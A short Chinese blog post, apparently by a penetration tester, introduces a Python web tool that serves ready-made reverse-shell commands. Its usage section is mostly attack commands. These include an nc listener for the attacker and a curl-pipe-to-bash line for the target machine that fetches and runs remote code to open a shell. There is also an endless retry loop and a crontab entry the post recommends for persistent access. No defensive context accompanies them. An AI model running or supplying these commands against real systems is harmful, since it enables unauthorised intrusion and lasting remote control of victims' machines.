网络安全研究员、渗透测试攻城狮
文能社会工程学，武能过狗拿shell
日的了站，做的了饭。
人生格言：即使是咸鱼，也一定是最咸的那条

基于BS架构的自动化反弹shell

发布于 2018-11-16 469 次阅读

这是一个node.js脚本改的python工具，攻击者搭建服务器先运行该程序，会启动一个web服务。然后只需在目标机器中对服务器发起请求，提交反弹shell的地址和端口，会自动返回构造好的shell命令然后逐个测试，直到命令成功执行。

运行方法：
VPS / Domain ：

python Get_Reverse_Shell.py
Attacker:
nc -lvp [reverse_port]
Target
curl http://domain/reverse_ip/reverse_port | bash
或者
while true; do curl http://domain/reverse_ip/reverse_port | bash; done
配合crontab使用效果更佳
crontab -e
/usr/bin/curl http://domain/reverse_ip/reverse_port | bash

下载

赏

python识别图形验证码bug解决笔记

Author

administrator

网络安全研究员、渗透测试攻城狮
文能社会工程学，武能过狗拿shell
日的了站，做的了饭。
人生格言：即使是咸鱼，也一定是最咸的那条

查看评论 - NOTHING

Comments | NOTHING

暂无评论

取消回复

要发表评论，您必须先登录。

切换主题 | SCHEME TOOL

python识别图形验证码bug解决笔记

ubuntu学习之路

administrator

Comments | NOTHING

取消回复